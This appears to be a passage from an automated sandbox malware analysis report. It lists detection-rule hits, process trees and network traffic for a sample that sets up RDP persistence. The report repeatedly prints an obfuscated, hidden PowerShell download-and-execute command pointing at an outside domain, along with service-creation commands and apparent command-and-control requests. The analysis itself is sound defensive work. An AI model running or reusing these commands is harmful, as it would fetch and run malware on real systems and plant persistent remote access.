"SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7852, ParentProcessName: cmd.exe, ProcessCommandLine: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , ProcessId: 7944, ProcessName: powershell.exe
      Sigma detected: Dynamic CSharp Compile Artefact
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7944, TargetFilename: C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline
      Sigma detected: Net.exe Execution
      Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7816, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 5860, ProcessName: net.exe
      Sigma detected: New Service Creation Using Sc.EXE
      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7816, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 5524, ProcessName: sc.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , CommandLine: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , CommandLine|base64offset|contains: <FD,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7852, ParentProcessName: cmd.exe, ProcessCommandLine: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , ProcessId: 7944, ProcessName: powershell.exe
      Sigma detected: SC.EXE Query Execution
      Source: Process startedAuthor: frack113: Data: Command: sc query myRdpService, CommandLine: sc query myRdpService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc query myRdpService, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8508, ParentProcessName: cmd.exe, ProcessCommandLine: sc query myRdpService, ProcessId: 6820, ProcessName: sc.exe
      Sigma detected: Start Windows Service Via Net.EXE
      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7816, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 5860, ProcessName: net.exe

      Data Obfuscation

      barindex
      Sigma detected: Dot net compiler compiles file from suspicious location
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7944, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline", ProcessId: 7372, ProcessName: csc.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-08T10:58:58.312682+010020283713Unknown Traffic192.168.11.304975323.44.201.30443TCP
      2024-11-08T11:00:01.763692+010020283713Unknown Traffic192.168.11.304975623.209.72.25443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-08T10:59:41.507178+010028033053Unknown Traffic192.168.11.3049754172.67.137.62443TCP
      2024-11-08T11:00:21.598227+010028033053Unknown Traffic192.168.11.3049760172.67.137.62443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-08T10:58:11.877522+010028032742Potentially Bad Traffic192.168.11.3049729172.67.137.62443TCP
      2024-11-08T10:58:14.194032+010028032742Potentially Bad Traffic192.168.11.3049731172.67.137.62443TCP
      2024-11-08T10:58:16.449478+010028032742Potentially Bad Traffic192.168.11.3049733172.67.137.62443TCP
      2024-11-08T10:58:39.626652+010028032742Potentially Bad Traffic192.168.11.3049747172.67.137.62443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for dropped file
      Source: C:\Windows\Temp\svczHost.exeReversingLabs: Detection: 15%
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49754 version: TLS 1.2
      Source: Binary string: Automation.pdb-4437Rl,eB source: powershell.exe, 00000006.00000002.2977462889.0000022EFF5D6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft Unified Security Protocol Provider.pdbc source: powershell.exe, 0000000A.00000002.3740096561.000001EE6D0D0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdb` source: powershell.exe, 0000000A.00000002.3732973453.000001EE6CDDC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdbpdbtem.pdb source: powershell.exe, 0000000A.00000002.3739069923.000001EE6D07A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: m.pdb0 source: powershell.exe, 0000000A.00000002.3740096561.000001EE6D125000.00000004.00000020.00020000.00000000.sdmp

      Networking

      barindex
      Potential dropper URLs found in powershell memory
      Source: powershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmpString found in memory: <&nbsp;&nbsp;&nbsp;"><a href="http://style="float:left;concerned with the=http%3A%2F%2Fwww.in popular culturetype="text/css" />it is possible to Harvard Universitytylesheet" href="/the main characterOxford University name="keywords" cstyle="text-align:the United Kingdomfederal government<div style="margin depending on the description of the<div class="header.min.js"></script>destruction of theslightly differentin accordance withtelecommunicationsindicates that theshortly thereafterespecially in the European countriesHowever, there aresrc="http://staticsuggested that the" src="http://www.a large number of Telecommunications" rel="nofollow" tHoly Roman Emperoralmost exclusively" border="0" alt="Secretary of Stateculminating in theCIA World Factbookthe most importantanniversary of thestyle="background-<li><em><a href="/the Atlantic Oceanstrictly speaking,shortly before thedifferent types ofthe Ottoman Empire><img src="http://An Introduction toconsequence of thedeparture from theConfederate Statesindigenous peoplesProceedings of theinformation on thetheories have beeninvolvement in thedivided into threeadjacent countriesis responsible fordissolution of thecollaboration withwidely regarded ashis contemporariesfounding member ofDominican Republicgenerally acceptedthe possibility ofare also availableunder constructionrestoration of thethe general publicis almost entirelypasses through thehas been suggestedcomputer and videoGermanic languages according to the different from theshortly afterwardshref="https://www.recent developmentBoard of Directors<div class="search| <a href="http://In particular, theMultiple footnotesor other substancethousands of yearstranslation of the</div>
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 8000
      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 8008
      Source: unknownNetwork traffic detected: HTTP traffic on port 8008 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8000
      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49759
      Source: global trafficTCP traffic: 192.168.11.30:49757 -> 23.88.71.29:8000
      Source: global trafficTCP traffic: 192.168.11.30:49758 -> 206.206.126.252:8008
      Source: global trafficHTTP traffic detected: GET /StaticFile/RdpService/32 HTTP/1.1Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /StaticFile/TermServiceTryRun/53 HTTP/1.1Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: rG4xY6l9GU61tyuh7IveiA==Sec-WebSocket-Version: 13
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 206.206.126.252:8008Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: J87z2mPEuUKm1EuLarywEw==Sec-WebSocket-Version: 13
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: NhGybyMvX0e72JtAxlQvsw==Sec-WebSocket-Version: 13
      Source: Joe Sandbox ViewIP Address: 172.67.137.62 172.67.137.62
      Source: Joe Sandbox ViewIP Address: 23.41.168.139 23.41.168.139
      Source: Joe Sandbox ViewIP Address: 206.206.126.252 206.206.126.252
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49753 -> 23.44.201.30:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49756 -> 23.209.72.25:443
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49733 -> 172.67.137.62:443
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49729 -> 172.67.137.62:443
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49731 -> 172.67.137.62:443
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49747 -> 172.67.137.62:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49754 -> 172.67.137.62:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49760 -> 172.67.137.62:443
      Source: global trafficHTTP traffic detected: GET /D HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /file3/0e8334e27730f66442615276cd9b2fc8cf5e6a24376c7dc468f7998d07140480f560003411e5c2edaf5d85d750c05659a2be7616557804e0bfc96dd179470fe4c278171f9e81e55643e7a125dc57e9656a5ad8c0cfb4383d01580a4ada31faea/Windows%20Defender/16/16/user/182 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211874eaf2d7bf53485b09f44dc9fdc79407 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
      Source: global trafficHTTP traffic detected: GET /file2/93f36e811e874b78005b821ed94567028efd4af63744edf59ae10ea6014e493f11f03c7c73e0ddc766cd6e33c169ba4adf731aab45a3bef0c2baa55bb4969e4b535f5d0c46f123fe9927806d2388a1e5f8eeee52a1dcd986e80a54646d888f53e12cce2b10ff81035b88a1bba0cb3f04 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118fe714ca0926b898b3d3eca0a81e1c210 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
      Source: global trafficHTTP traffic detected: GET /file2/df74c18f34c2e710d864267392a9e7dd536421db41569695baf1b4e12a83cfb137d5fed4fab389dc3fe1f9d14e2ea9b0b1c6f436ead6c833a67fc34705a34ce37f99ec390c3f84cff14e2301a6a62566a46ff50f8be9ce2a5ac5ee46c1890e16fc40853878a3246bd074c17326c34158 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321183b73b8235764f47dd55c3fa53226e74b HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 85
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321183b73b8235764f47dd55c3fa53226e74b HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 86
      Source: global trafficHTTP traffic detected: GET /file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33a1ad49ca3cce39415efa5e154367a48c9b2235950ff73e0aa6e501ee70b1a57fd20e0e662cce5de5e764c8ea69e8f5460905e960f2da5e2d0f365f522005f31ce54fbcd4e6cc47d74d60a5e59c2a76ec HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321183b73b8235764f47dd55c3fa53226e74b HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 62
      Source: global trafficHTTP traffic detected: GET /file2/67f0828de55a7b0ae4143def41be5826e35728fe516a68fd7776f4f474689bc6ab22273c73b70a1db6a1d1a5a722db57826cdbaf9bb1da919ab6b53967c4bf044fb82b81afdbf15569d5eccde03bc8c4a7a71498eb1d6b80d2600766aa798119e9744ccb9a12497618e8c21987262036 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e93b36f1509e1bece2e4505fef HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 140
      Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.3.20269 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e93b36f1509e1bece2e4505fef HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 69
      Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec46903b0dfb975b9987fd6729e67c891c4b329b887232148c7de62a277aa7bb9f7bb172d0ba0fe9be28b36313fd0fe9b172de332f05512cd1a8b06a678d6fb6ee2d640939cb40f267bbf685fe9daffed49f6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e93b36f1509e1bece2e4505fef HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 200
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e93b36f1509e1bece2e4505fef HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 97
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e93b36f1509e1bece2e4505fef HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 64
      Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
      Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
      Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
      Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
      Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
      Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
      Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
      Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
      Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
      Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
      Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /D HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /file3/0e8334e27730f66442615276cd9b2fc8cf5e6a24376c7dc468f7998d07140480f560003411e5c2edaf5d85d750c05659a2be7616557804e0bfc96dd179470fe4c278171f9e81e55643e7a125dc57e9656a5ad8c0cfb4383d01580a4ada31faea/Windows%20Defender/16/16/user/182 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /file2/93f36e811e874b78005b821ed94567028efd4af63744edf59ae10ea6014e493f11f03c7c73e0ddc766cd6e33c169ba4adf731aab45a3bef0c2baa55bb4969e4b535f5d0c46f123fe9927806d2388a1e5f8eeee52a1dcd986e80a54646d888f53e12cce2b10ff81035b88a1bba0cb3f04 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
